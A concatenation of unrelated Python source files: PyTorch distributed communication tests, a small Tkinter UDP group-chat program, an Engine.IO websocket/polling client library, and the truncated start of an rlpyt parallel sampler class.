torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [200, 400]
)
self.assertEqual([[0], [1], [2, 4], [3, 5]], result)
self.assertEqual(per_bucket_size_limits, [200, 200, 400, 400])
class AbstractCommTest(object):
@property
def op_timeout_sec(self):
return 1
@property
def world_size(self):
return 2
def _verify_sequence_number_across_pg(self, pg, verify_pg):
seq_num = pg._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size(verify_pg))]
# We use a separate pg to verify the sequence numbers, otherwise these
# collectives will themselves increment the sequence number.
dist.all_gather_object(obj_list, seq_num, group=verify_pg)
self.assertEqual(len(set(obj_list)), 1)
return obj_list[0]
def _test_sequence_num_incremented(self, process_group, ranks):
# verify initial sequence numbers. Use a distinct process group for
# verification to keep counts as expected with respect to process_group.
verify_pg = dist.new_group(
ranks=ranks,
backend="gloo",
)
assert dist.get_world_size(process_group) == dist.get_world_size(verify_pg)
initial_num = (
self._verify_sequence_number_across_pg(
pg=process_group, verify_pg=verify_pg
)
if not c10d.distributed_c10d._rank_not_in_group(process_group)
else -1
)
# Verify sequence numbers are appropriately incremented
for i in range(10):
t = torch.ones(1, device=torch.cuda.current_device())
dist.all_reduce(t, group=process_group)
if not c10d.distributed_c10d._rank_not_in_group(process_group):
seq_num = self._verify_sequence_number_across_pg(
pg=process_group,
verify_pg=verify_pg,
)
self.assertEqual(initial_num + i + 1, seq_num)
if dist.get_world_size(process_group) > 2:
# Test when certain ranks don't call collectives
if dist.get_rank(process_group) not in [0, 2]:
dist.all_reduce(t, group=process_group, async_op=True)
# Now ranks 0 and 2 should be lagging by 1.
if not c10d.distributed_c10d._rank_not_in_group(process_group):
seq_num = process_group._get_sequence_number_for_group()
rank = dist.get_rank(process_group)
obj_list = [None for _ in range(dist.get_world_size(verify_pg))]
dist.all_gather_object(obj_list, (rank, seq_num), group=verify_pg)
rank_to_seq_num = {rank: num for (rank, num) in obj_list}
self.assertEqual(len(set(rank_to_seq_num.values())), 2)
self.assertEqual(rank_to_seq_num[0], rank_to_seq_num[2])
expected_same = {
rank_to_seq_num[i]
for i in rank_to_seq_num.keys()
if i not in [0, 2]
}
self.assertEqual(len(expected_same), 1)
self.assertEqual(rank_to_seq_num[0] + 1, rank_to_seq_num[1])
def _test_sequence_num_incremented_default_group(self, backend_name):
torch.cuda.set_device(self.rank)
store = c10d.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend_name,
world_size=self.world_size,
rank=self.rank,
store=store,
)
self._test_sequence_num_incremented(
c10d.distributed_c10d._get_default_group(),
ranks=list(i for i in range(dist.get_world_size())),
)
def _test_sequence_num_incremented_subgroup(self, backend_name):
torch.cuda.set_device(self.rank)
store = c10d.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend_name,
world_size=self.world_size,
rank=self.rank,
store=store,
)
subgroup_ranks = [0, 1, 2]
subgroup = dist.new_group(subgroup_ranks)
self._test_sequence_num_incremented(subgroup, subgroup_ranks)
def _test_sequence_num_set_default_pg(self, backend):
store = c10d.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend,
world_size=self.world_size,
rank=self.rank,
store=store,
)
default_pg = c10d.distributed_c10d._get_default_group()
seq_num = default_pg._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size())]
dist.all_gather_object(obj_list, seq_num)
self.assertEqual(len(set(obj_list)), 1)
def _test_sequence_num_set_new_group(self, backend):
store = c10d.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend,
world_size=self.world_size,
rank=self.rank,
store=store,
)
subgroup = dist.new_group([0, 1])
if not c10d.distributed_c10d._rank_not_in_group(subgroup):
subgroup_seq = subgroup._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size(subgroup))]
dist.all_gather_object(obj_list, subgroup_seq, group=subgroup)
self.assertEqual(len(set(obj_list)), 1)
class CommTest(AbstractCommTest, MultiProcessTestCase):
def setUp(self):
super(CommTest, self).setUp()
self._spawn_processes()
def tearDown(self):
super(CommTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
def test_distributed_debug_mode(self):
# Default should be off
default_debug_mode = dist._get_debug_mode()
self.assertEqual(default_debug_mode, dist._DistributedDebugLevel.OFF)
mapping = {
"OFF": dist._DistributedDebugLevel.OFF,
"INFO": dist._DistributedDebugLevel.INFO,
"DETAIL": dist._DistributedDebugLevel.DETAIL,
}
invalid_debug_modes = ["foo", 0, 1, -1]
for mode in mapping.keys():
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
set_debug_mode = dist._get_debug_mode()
self.assertEqual(
set_debug_mode,
mapping[mode],
f"Expected {mode} to map to {mapping[mode]} but got {set_debug_mode}",
)
for mode in invalid_debug_modes:
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
with self.assertRaisesRegex(RuntimeError, "to be one of"):
dist._get_debug_mode()
class DummyWork(dist._Work):
def wait(self, timeout=5.0):
if torch.cuda.is_available():
torch.cuda.current_stream().synchronize()
return True
class DummyProcessGroup(dist.ProcessGroup):
def getBackendName(self):
return "Dummy"
def allgather(self, output_tensor_lists, input_tensor_list, opts=None):
for output_tensor_list, input_tensor in zip(output_tensor_lists, input_tensor_list):
for output_tensor in output_tensor_list:
output_tensor.copy_(input_tensor)
return DummyWork()
def allreduce(self, tensor_list, opts=None):
for tensor in tensor_list:
tensor.add_(2)
return DummyWork()
def broadcast(self, tensor_list, opts=None):
for tensor in tensor_list:
tensor.add_(1)
return DummyWork()
def reduce_scatter(self, output_tensor_list, input_tensor_lists, opts=None):
for output_tensor, input_tensor_list in zip(output_tensor_list, input_tensor_lists):
output_tensor.copy_(input_tensor_list[self.rank()])
return DummyWork()
def send(self, tensor_list, dst, tag=0):
for tensor in tensor_list:
tensor.add_(1)
return DummyWork()
def recv(self, tensor_list, src, tag=0):
for tensor in tensor_list:
tensor.add_(2)
return DummyWork()
class PythonProcessGroupTest(MultiProcessTestCase):
def setUp(self):
super(PythonProcessGroupTest, self).setUp()
self._spawn_processes()
def tearDown(self):
super(PythonProcessGroupTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
def test_get_backend_name(self):
dpg = DummyProcessGroup(0, 1)
self.assertEqual("Dummy", dpg.name())
@staticmethod
def create_dummy(store, rank, size, timeout):
return DummyProcessGroup(rank, size)
@unittest.skipIf(
common.IS_MACOS,
"Python c10d extension is not yet supported on MacOS"
)
def test_collectives(self):
dist.Backend.register_backend("dummy", PythonProcessGroupTest.create_dummy)
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = '6789'
dist.init_process_group("dummy", rank=self.rank, world_size=self.world_size)
# test all_gather
input_tensor = torch.ones(2, 2) * 7
output_tensor_list = [torch.zeros(2, 2) for _ in range(self.world_size)]
dist.all_gather(output_tensor_list, input_tensor)
for tensor in output_tensor_list:
self.assertEqual(tensor, input_tensor)
# test all_reduce
input_tensor = torch.ones(2, 2) * 7
dist.all_reduce(input_tensor)
self.assertEqual(input_tensor, torch.ones(2, 2) * 7 + 2)
# test broadcast
input_tensor = torch.zeros(2, 2)
dist.broadcast(input_tensor, 0, async_op=True).wait()
self.assertEqual(torch.ones(2, 2), input_tensor)
# test reduce_scatter
output_tensor = torch.zeros(2, 2)
input_tensor_list = [torch.ones(2, 2) for _ in range(self.world_size)]
dist.reduce_scatter(output_tensor, input_tensor_list)
self.assertEqual(output_tensor, torch.zeros(2, 2) + 1)
dist.destroy_process_group()
@unittest.skipIf(
common.IS_MACOS,
"Python c10d extension is not yet supported on MacOS"
)
def test_send_recv(self):
dist.Backend.register_backend("dummy", PythonProcessGroupTest.create_dummy)
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = '6789'
dist.init_process_group("dummy", rank=self.rank, world_size=self.world_size)
# test send
input_tensor = torch.zeros(2, 2)
dist.send(input_tensor, (self.rank + 1) % self.world_size)
self.assertEqual(input_tensor, torch.zeros(2, 2) + 1)
# test recv
input_tensor = torch.zeros(2, 2)
dist.recv(input_tensor, (self.rank + 1) % self.world_size)
self.assertEqual(input_tensor, torch.zeros(2, 2) + 2)
# intentionally not calling into `destroy_process_group` as not all
        # user applications would explicitly call it.
if __name__ == "__main__":
assert (
not torch.cuda._initialized
), "test_distributed must not have initialized CUDA context on main process"
run_tests()
|
Chat.py
|
import socket
import sys
from threading import Thread
from tkinter import *
from tkinter import messagebox
# create socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ip = "0.0.0.0"
port = 81
s.bind((ip, port))
num = 1
users = {"192.168.56.102": ["JOHN", "dark green"],
"192.168.56.103": ["TOM", "DarkOrchid4"]}
# send and display the data on button click
def clicked():
global num
try:
data = txtfld.get().rstrip()
if data != '':
for ip in users.keys():
s.sendto(data.encode(), (ip, 81))
Label(msgframe, text=f"▷ {data}", fg='SlateBlue4', font=10, bg='lavender').grid(
row=num, column=1, sticky=E, padx=20)
num += 1
canvas.yview_moveto('1.0')
except Exception as e:
messagebox.showerror('Error', e)
# receiving data and displaying it
def receive():
global num
try:
while True:
data = s.recvfrom(1024)
Label(msgframe, text=f"{users[data[1][0]][0]}:", fg=users[data[1][0]][1], bg='lavender').grid(
row=num, column=0, sticky=W, padx=20)
num += 1
Label(msgframe, text=f"▷ {data[0].decode()}", fg=users[data[1][0]][1], font=10, bg='lavender').grid(
row=num, column=0, sticky=W, padx=20)
num += 1
canvas.yview_moveto('1.0')
except Exception as e:
if s._closed:
print("Program is terminated")
else:
print(e)
# thread to start receiving data
t = Thread(target=receive)
t.daemon = True
t.start()
# scroller for canvas
def myfunction(event):
canvas.configure(scrollregion = canvas.bbox("all"))
# setting width of msgframe equal to canvas width
def frameWidth(event):
canvas_width = event.width
canvas.itemconfig(canvas_frame, width = canvas_width)
# creating window
root = Tk()
root.title('ChAt (192.168.56.1) - Hello Eric!')
root.geometry("700x600+350+150")
uinput = StringVar()
# header frame
head = Frame(root, relief=RAISED, borderwidth=0, bg='bisque')
head.pack(fill=X, side=TOP)
Label(head, text="Group Chat", font=15, bg='bisque').pack(
side='left', padx=10, pady=4)
# frame where message will print, in a scrollable canvas
myframe = Frame(root, relief=GROOVE, bd=1)
myframe.pack(fill=BOTH, expand=True, side=TOP)
canvas = Canvas(myframe, bg='lavender')
msgframe = Frame(canvas, relief=RAISED, borderwidth=0, bg='lavender')
msgframe.columnconfigure(1, weight=1)
msgframe.pack(fill=BOTH, expand=True, side=TOP, pady=20)
myscrollbar = Scrollbar(myframe, orient="vertical", command=canvas.yview)
canvas.configure(yscrollcommand=myscrollbar.set)
myscrollbar.pack(side="right", fill="y", expand=False)
canvas.pack(fill=BOTH, side="top", expand=True)
canvas_frame = canvas.create_window(0, 0, window=msgframe, anchor='nw')
msgframe.bind("<Configure>", myfunction)
canvas.bind('<Configure>', frameWidth)
# footer frame, taking input
frame = Frame(root, relief=RAISED, borderwidth=0, bg='bisque')
frame.pack(fill=X, side=BOTTOM)
btn = Button(frame, text="SEND", fg='SlateBlue4', width=10, font=4,
activeforeground='white', activebackground='SlateBlue4', borderwidth=1, command=clicked)
btn.pack(side=RIGHT, expand=True, padx=10, pady=4)
txtfld = Entry(frame, textvariable=uinput, bd=1,
width=150, font=10, fg='SlateBlue4')
txtfld.pack(side=BOTTOM, expand=True, padx=10, pady=4)
# looping the window
root.mainloop()
s.close()
sys.exit()
|
client.py
|
from base64 import b64encode
from engineio.json import JSONDecodeError
import logging
import queue
import signal
import ssl
import threading
import time
import urllib
try:
import requests
except ImportError: # pragma: no cover
requests = None
try:
import websocket
except ImportError: # pragma: no cover
websocket = None
from . import exceptions
from . import packet
from . import payload
default_logger = logging.getLogger('engineio.client')
connected_clients = []
def signal_handler(sig, frame):
"""SIGINT handler.
Disconnect all active clients and then invoke the original signal handler.
"""
for client in connected_clients[:]:
if not client.is_asyncio_based():
client.disconnect()
if callable(original_signal_handler):
return original_signal_handler(sig, frame)
else: # pragma: no cover
# Handle case where no original SIGINT handler was present.
return signal.default_int_handler(sig, frame)
original_signal_handler = None
class Client(object):
"""An Engine.IO client.
This class implements a fully compliant Engine.IO web client with support
for websocket and long-polling transports.
:param logger: To enable logging set to ``True`` or pass a logger object to
use. To disable logging set to ``False``. The default is
``False``. Note that fatal errors are logged even when
``logger`` is ``False``.
:param json: An alternative json module to use for encoding and decoding
packets. Custom json modules must have ``dumps`` and ``loads``
functions that are compatible with the standard library
versions.
:param request_timeout: A timeout in seconds for requests. The default is
5 seconds.
:param http_session: an initialized ``requests.Session`` object to be used
when sending requests to the server. Use it if you
need to add special client options such as proxy
servers, SSL certificates, custom CA bundle, etc.
:param ssl_verify: ``True`` to verify SSL certificates, or ``False`` to
skip SSL certificate verification, allowing
connections to servers with self signed certificates.
The default is ``True``.
"""
event_names = ['connect', 'disconnect', 'message']
def __init__(self,
logger=False,
json=None,
request_timeout=5,
http_session=None,
ssl_verify=True):
global original_signal_handler
if original_signal_handler is None and \
threading.current_thread() == threading.main_thread():
original_signal_handler = signal.signal(signal.SIGINT,
signal_handler)
self.handlers = {}
self.base_url = None
self.transports = None
self.current_transport = None
self.sid = None
self.upgrades = None
self.ping_interval = None
self.ping_timeout = None
self.http = http_session
self.ws = None
self.read_loop_task = None
self.write_loop_task = None
self.queue = None
self.state = 'disconnected'
self.ssl_verify = ssl_verify
if json is not None:
packet.Packet.json = json
if not isinstance(logger, bool):
self.logger = logger
else:
self.logger = default_logger
if self.logger.level == logging.NOTSET:
if logger:
self.logger.setLevel(logging.INFO)
else:
self.logger.setLevel(logging.ERROR)
self.logger.addHandler(logging.StreamHandler())
self.request_timeout = request_timeout
def is_asyncio_based(self):
return False
def on(self, event, handler=None):
"""Register an event handler.
:param event: The event name. Can be ``'connect'``, ``'message'`` or
``'disconnect'``.
:param handler: The function that should be invoked to handle the
event. When this parameter is not given, the method
acts as a decorator for the handler function.
Example usage::
# as a decorator:
@eio.on('connect')
def connect_handler():
print('Connection request')
# as a method:
def message_handler(msg):
print('Received message: ', msg)
eio.send('response')
eio.on('message', message_handler)
"""
if event not in self.event_names:
raise ValueError('Invalid event')
def set_handler(handler):
self.handlers[event] = handler
return handler
if handler is None:
return set_handler
set_handler(handler)
def connect(self, url, headers=None, transports=None,
engineio_path='engine.io'):
"""Connect to an Engine.IO server.
:param url: The URL of the Engine.IO server. It can include custom
query string parameters if required by the server.
:param headers: A dictionary with custom headers to send with the
connection request.
:param transports: The list of allowed transports. Valid transports
are ``'polling'`` and ``'websocket'``. If not
given, the polling transport is connected first,
then an upgrade to websocket is attempted.
:param engineio_path: The endpoint where the Engine.IO server is
installed. The default value is appropriate for
most cases.
Example usage::
eio = engineio.Client()
eio.connect('http://localhost:5000')
"""
if self.state != 'disconnected':
raise ValueError('Client is not in a disconnected state')
valid_transports = ['polling', 'websocket']
if transports is not None:
if isinstance(transports, str):
transports = [transports]
transports = [transport for transport in transports
if transport in valid_transports]
if not transports:
raise ValueError('No valid transports provided')
self.transports = transports or valid_transports
self.queue = self.create_queue()
return getattr(self, '_connect_' + self.transports[0])(
url, headers or {}, engineio_path)
def wait(self):
"""Wait until the connection with the server ends.
Client applications can use this function to block the main thread
during the life of the connection.
"""
if self.read_loop_task:
self.read_loop_task.join()
def send(self, data):
"""Send a message to a client.
:param data: The data to send to the client. Data can be of type
``str``, ``bytes``, ``list`` or ``dict``. If a ``list``
or ``dict``, the data will be serialized as JSON.
"""
self._send_packet(packet.Packet(packet.MESSAGE, data=data))
def disconnect(self, abort=False):
"""Disconnect from the server.
:param abort: If set to ``True``, do not wait for background tasks
associated with the connection to end.
"""
if self.state == 'connected':
self._send_packet(packet.Packet(packet.CLOSE))
self.queue.put(None)
self.state = 'disconnecting'
self._trigger_event('disconnect', run_async=False)
if self.current_transport == 'websocket':
self.ws.close()
if not abort:
self.read_loop_task.join()
self.state = 'disconnected'
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
def transport(self):
"""Return the name of the transport currently in use.
The possible values returned by this function are ``'polling'`` and
``'websocket'``.
"""
return self.current_transport
def start_background_task(self, target, *args, **kwargs):
"""Start a background task.
This is a utility function that applications can use to start a
background task.
:param target: the target function to execute.
:param args: arguments to pass to the function.
:param kwargs: keyword arguments to pass to the function.
This function returns an object compatible with the `Thread` class in
the Python standard library. The `start()` method on this object is
already called by this function.
"""
th = threading.Thread(target=target, args=args, kwargs=kwargs)
th.start()
return th
def sleep(self, seconds=0):
"""Sleep for the requested amount of time."""
return time.sleep(seconds)
def create_queue(self, *args, **kwargs):
"""Create a queue object."""
q = queue.Queue(*args, **kwargs)
q.Empty = queue.Empty
return q
def create_event(self, *args, **kwargs):
"""Create an event object."""
return threading.Event(*args, **kwargs)
def _reset(self):
self.state = 'disconnected'
self.sid = None
def _connect_polling(self, url, headers, engineio_path):
"""Establish a long-polling connection to the Engine.IO server."""
if requests is None: # pragma: no cover
# not installed
self.logger.error('requests package is not installed -- cannot '
'send HTTP requests!')
return
self.base_url = self._get_engineio_url(url, engineio_path, 'polling')
self.logger.info('Attempting polling connection to ' + self.base_url)
r = self._send_request(
'GET', self.base_url + self._get_url_timestamp(), headers=headers,
timeout=self.request_timeout)
if r is None:
self._reset()
raise exceptions.ConnectionError(
'Connection refused by the server')
if r.status_code < 200 or r.status_code >= 300:
self._reset()
try:
arg = r.json()
except JSONDecodeError:
arg = None
raise exceptions.ConnectionError(
'Unexpected status code {} in server response'.format(
r.status_code), arg)
try:
p = payload.Payload(encoded_payload=r.content.decode('utf-8'))
except ValueError:
raise exceptions.ConnectionError(
'Unexpected response from server') from None
open_packet = p.packets[0]
if open_packet.packet_type != packet.OPEN:
raise exceptions.ConnectionError(
'OPEN packet not returned by server')
self.logger.info(
'Polling connection accepted with ' + str(open_packet.data))
self.sid = open_packet.data['sid']
self.upgrades = open_packet.data['upgrades']
self.ping_interval = int(open_packet.data['pingInterval']) / 1000.0
self.ping_timeout = int(open_packet.data['pingTimeout']) / 1000.0
self.current_transport = 'polling'
self.base_url += '&sid=' + self.sid
self.state = 'connected'
connected_clients.append(self)
self._trigger_event('connect', run_async=False)
for pkt in p.packets[1:]:
self._receive_packet(pkt)
if 'websocket' in self.upgrades and 'websocket' in self.transports:
# attempt to upgrade to websocket
if self._connect_websocket(url, headers, engineio_path):
# upgrade to websocket succeeded, we're done here
return
# start background tasks associated with this client
self.write_loop_task = self.start_background_task(self._write_loop)
self.read_loop_task = self.start_background_task(
self._read_loop_polling)
def _connect_websocket(self, url, headers, engineio_path):
"""Establish or upgrade to a WebSocket connection with the server."""
if websocket is None: # pragma: no cover
# not installed
self.logger.error('websocket-client package not installed, only '
'polling transport is available')
return False
websocket_url = self._get_engineio_url(url, engineio_path, 'websocket')
if self.sid:
self.logger.info(
'Attempting WebSocket upgrade to ' + websocket_url)
upgrade = True
websocket_url += '&sid=' + self.sid
else:
upgrade = False
self.base_url = websocket_url
self.logger.info(
'Attempting WebSocket connection to ' + websocket_url)
# get cookies and other settings from the long-polling connection
# so that they are preserved when connecting to the WebSocket route
cookies = None
extra_options = {}
if self.http:
# cookies
cookies = '; '.join(["{}={}".format(cookie.name, cookie.value)
for cookie in self.http.cookies])
for header, value in headers.items():
if header.lower() == 'cookie':
if cookies:
cookies += '; '
cookies += value
del headers[header]
break
# auth
if 'Authorization' not in headers and self.http.auth is not None:
if not isinstance(self.http.auth, tuple): # pragma: no cover
raise ValueError('Only basic authentication is supported')
basic_auth = '{}:{}'.format(
self.http.auth[0], self.http.auth[1]).encode('utf-8')
basic_auth = b64encode(basic_auth).decode('utf-8')
headers['Authorization'] = 'Basic ' + basic_auth
# cert
# this can be given as ('certfile', 'keyfile') or just 'certfile'
if isinstance(self.http.cert, tuple):
extra_options['sslopt'] = {
'certfile': self.http.cert[0],
'keyfile': self.http.cert[1]}
elif self.http.cert:
extra_options['sslopt'] = {'certfile': self.http.cert}
# proxies
if self.http.proxies:
proxy_url = None
if websocket_url.startswith('ws://'):
proxy_url = self.http.proxies.get(
'ws', self.http.proxies.get('http'))
else: # wss://
proxy_url = self.http.proxies.get(
'wss', self.http.proxies.get('https'))
if proxy_url:
parsed_url = urllib.parse.urlparse(
proxy_url if '://' in proxy_url
else 'scheme://' + proxy_url)
extra_options['http_proxy_host'] = parsed_url.hostname
extra_options['http_proxy_port'] = parsed_url.port
extra_options['http_proxy_auth'] = (
(parsed_url.username, parsed_url.password)
if parsed_url.username or parsed_url.password
else None)
# verify
if isinstance(self.http.verify, str):
if 'sslopt' in extra_options:
extra_options['sslopt']['ca_certs'] = self.http.verify
else:
extra_options['sslopt'] = {'ca_certs': self.http.verify}
elif not self.http.verify:
self.ssl_verify = False
if not self.ssl_verify:
extra_options['sslopt'] = {"cert_reqs": ssl.CERT_NONE}
try:
ws = websocket.create_connection(
websocket_url + self._get_url_timestamp(), header=headers,
cookie=cookies, enable_multithread=True, **extra_options)
except (ConnectionError, IOError, websocket.WebSocketException):
if upgrade:
self.logger.warning(
'WebSocket upgrade failed: connection error')
return False
else:
raise exceptions.ConnectionError('Connection error')
if upgrade:
p = packet.Packet(packet.PING, data='probe').encode()
try:
ws.send(p)
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected send exception: %s',
str(e))
return False
try:
p = ws.recv()
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected recv exception: %s',
str(e))
return False
pkt = packet.Packet(encoded_packet=p)
if pkt.packet_type != packet.PONG or pkt.data != 'probe':
self.logger.warning(
'WebSocket upgrade failed: no PONG packet')
return False
p = packet.Packet(packet.UPGRADE).encode()
try:
ws.send(p)
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected send exception: %s',
str(e))
return False
self.current_transport = 'websocket'
self.logger.info('WebSocket upgrade was successful')
else:
try:
p = ws.recv()
except Exception as e: # pragma: no cover
raise exceptions.ConnectionError(
'Unexpected recv exception: ' + str(e))
open_packet = packet.Packet(encoded_packet=p)
if open_packet.packet_type != packet.OPEN:
raise exceptions.ConnectionError('no OPEN packet')
self.logger.info(
'WebSocket connection accepted with ' + str(open_packet.data))
self.sid = open_packet.data['sid']
self.upgrades = open_packet.data['upgrades']
self.ping_interval = int(open_packet.data['pingInterval']) / 1000.0
self.ping_timeout = int(open_packet.data['pingTimeout']) / 1000.0
self.current_transport = 'websocket'
self.state = 'connected'
connected_clients.append(self)
self._trigger_event('connect', run_async=False)
self.ws = ws
self.ws.settimeout(self.ping_interval + self.ping_timeout)
# start background tasks associated with this client
self.write_loop_task = self.start_background_task(self._write_loop)
self.read_loop_task = self.start_background_task(
self._read_loop_websocket)
return True
def _receive_packet(self, pkt):
"""Handle incoming packets from the server."""
packet_name = packet.packet_names[pkt.packet_type] \
if pkt.packet_type < len(packet.packet_names) else 'UNKNOWN'
self.logger.info(
'Received packet %s data %s', packet_name,
pkt.data if not isinstance(pkt.data, bytes) else '<binary>')
if pkt.packet_type == packet.MESSAGE:
self._trigger_event('message', pkt.data, run_async=True)
elif pkt.packet_type == packet.PING:
self._send_packet(packet.Packet(packet.PONG, pkt.data))
elif pkt.packet_type == packet.CLOSE:
self.disconnect(abort=True)
elif pkt.packet_type == packet.NOOP:
pass
else:
self.logger.error('Received unexpected packet of type %s',
pkt.packet_type)
def _send_packet(self, pkt):
"""Queue a packet to be sent to the server."""
if self.state != 'connected':
return
self.queue.put(pkt)
self.logger.info(
'Sending packet %s data %s',
packet.packet_names[pkt.packet_type],
pkt.data if not isinstance(pkt.data, bytes) else '<binary>')
def _send_request(
self, method, url, headers=None, body=None,
timeout=None): # pragma: no cover
if self.http is None:
self.http = requests.Session()
if not self.ssl_verify:
self.http.verify = False
try:
return self.http.request(method, url, headers=headers, data=body,
timeout=timeout)
except requests.exceptions.RequestException as exc:
self.logger.info('HTTP %s request to %s failed with error %s.',
method, url, exc)
def _trigger_event(self, event, *args, **kwargs):
"""Invoke an event handler."""
run_async = kwargs.pop('run_async', False)
if event in self.handlers:
if run_async:
return self.start_background_task(self.handlers[event], *args)
else:
try:
return self.handlers[event](*args)
except:
self.logger.exception(event + ' handler error')
def _get_engineio_url(self, url, engineio_path, transport):
"""Generate the Engine.IO connection URL."""
engineio_path = engineio_path.strip('/')
parsed_url = urllib.parse.urlparse(url)
if transport == 'polling':
scheme = 'http'
elif transport == 'websocket':
scheme = 'ws'
else: # pragma: no cover
raise ValueError('invalid transport')
if parsed_url.scheme in ['https', 'wss']:
scheme += 's'
return ('{scheme}://{netloc}/{path}/?{query}'
'{sep}transport={transport}&EIO=4').format(
scheme=scheme, netloc=parsed_url.netloc,
path=engineio_path, query=parsed_url.query,
sep='&' if parsed_url.query else '',
transport=transport)
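        # Illustrative note (added for clarity, not part of the original library):
        # a hypothetical call such as _get_engineio_url('https://example.com:5000?token=abc',
        # 'engine.io', 'polling') would return
        # 'https://example.com:5000/engine.io/?token=abc&transport=polling&EIO=4'.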
def _get_url_timestamp(self):
"""Generate the Engine.IO query string timestamp."""
return '&t=' + str(time.time())
def _read_loop_polling(self):
"""Read packets by polling the Engine.IO server."""
while self.state == 'connected':
self.logger.info(
'Sending polling GET request to ' + self.base_url)
r = self._send_request(
'GET', self.base_url + self._get_url_timestamp(),
timeout=max(self.ping_interval, self.ping_timeout) + 5)
if r is None:
self.logger.warning(
'Connection refused by the server, aborting')
self.queue.put(None)
break
if r.status_code < 200 or r.status_code >= 300:
self.logger.warning('Unexpected status code %s in server '
'response, aborting', r.status_code)
self.queue.put(None)
break
try:
p = payload.Payload(encoded_payload=r.content.decode('utf-8'))
except ValueError:
self.logger.warning(
'Unexpected packet from server, aborting')
self.queue.put(None)
break
for pkt in p.packets:
self._receive_packet(pkt)
self.logger.info('Waiting for write loop task to end')
self.write_loop_task.join()
if self.state == 'connected':
self._trigger_event('disconnect', run_async=False)
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
self.logger.info('Exiting read loop task')
def _read_loop_websocket(self):
"""Read packets from the Engine.IO WebSocket connection."""
while self.state == 'connected':
p = None
try:
p = self.ws.recv()
except websocket.WebSocketTimeoutException:
self.logger.warning(
'Server has stopped communicating, aborting')
self.queue.put(None)
break
except websocket.WebSocketConnectionClosedException:
self.logger.warning(
'WebSocket connection was closed, aborting')
self.queue.put(None)
break
except Exception as e:
self.logger.info(
'Unexpected error receiving packet: "%s", aborting',
str(e))
self.queue.put(None)
break
try:
pkt = packet.Packet(encoded_packet=p)
except Exception as e: # pragma: no cover
self.logger.info(
'Unexpected error decoding packet: "%s", aborting', str(e))
self.queue.put(None)
break
self._receive_packet(pkt)
self.logger.info('Waiting for write loop task to end')
self.write_loop_task.join()
if self.state == 'connected':
self._trigger_event('disconnect', run_async=False)
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
self.logger.info('Exiting read loop task')
def _write_loop(self):
"""This background task sends packages to the server as they are
pushed to the send queue.
"""
while self.state == 'connected':
# to simplify the timeout handling, use the maximum of the
# ping interval and ping timeout as timeout, with an extra 5
# seconds grace period
timeout = max(self.ping_interval, self.ping_timeout) + 5
packets = None
try:
packets = [self.queue.get(timeout=timeout)]
except self.queue.Empty:
self.logger.error('packet queue is empty, aborting')
break
if packets == [None]:
self.queue.task_done()
packets = []
else:
while True:
try:
packets.append(self.queue.get(block=False))
except self.queue.Empty:
break
if packets[-1] is None:
packets = packets[:-1]
self.queue.task_done()
break
if not packets:
# empty packet list returned -> connection closed
break
if self.current_transport == 'polling':
p = payload.Payload(packets=packets)
r = self._send_request(
'POST', self.base_url, body=p.encode(),
headers={'Content-Type': 'application/octet-stream'},
timeout=self.request_timeout)
for pkt in packets:
self.queue.task_done()
if r is None:
self.logger.warning(
'Connection refused by the server, aborting')
break
if r.status_code < 200 or r.status_code >= 300:
self.logger.warning('Unexpected status code %s in server '
'response, aborting', r.status_code)
self._reset()
break
else:
# websocket
try:
for pkt in packets:
encoded_packet = pkt.encode()
if pkt.binary:
self.ws.send_binary(encoded_packet)
else:
self.ws.send(encoded_packet)
self.queue.task_done()
except (websocket.WebSocketConnectionClosedException,
BrokenPipeError, OSError):
self.logger.warning(
'WebSocket connection was closed, aborting')
break
self.logger.info('Exiting write loop task')
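# A minimal usage sketch, added here for illustration only (not part of the
# library); it assumes an Engine.IO server is reachable at http://localhost:5000:
#     eio = Client()
#     @eio.on('message')
#     def on_message(data):
#         print('received:', data)
#     eio.connect('http://localhost:5000')
#     eio.send('hello')
#     eio.wait()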
|
base.py
|
import multiprocessing as mp
import ctypes
import time
from rlpyt.samplers.base import BaseSampler
from rlpyt.samplers.buffer import build_samples_buffer
from rlpyt.samplers.parallel.worker import sampling_process
from rlpyt.utils.logging import logger
from rlpyt.utils.collections import AttrDict
from rlpyt.utils.synchronize import drain_queue
EVAL_TRAJ_CHECK = 0.1 # seconds.
class ParallelSamplerBase(BaseSampler):
gpu = False
######################################
# API
######################################
def initialize(
self,
agent,
affinity,
seed,
bootstrap_value=False,
traj_info_kwargs=None,
world_size=1,
rank=0,
worker_process=None,
):
n_envs_list = self._get_n_envs_list(affinity=affinity)
self.n_worker = n_worker = len(n_envs_list)
B = self.batch_spec.B
global_B = B * world_size
env_ranks = list(range(rank * B, (rank + 1) * B))
self.world_size = world_size
self.rank = rank
if self.eval_n_envs > 0:
self.eval_n_envs_per = max(1, self.eval_n_envs // n_worker)
self.eval_n_envs = eval_n_envs = self.eval_n_envs_per * n_worker
logger.log(f"Total parallel evaluation envs: {eval_n_envs}.")
self.eval_max_T = eval_max_T = int(self.eval_max_steps // eval_n_envs)
if self.is_pixel:
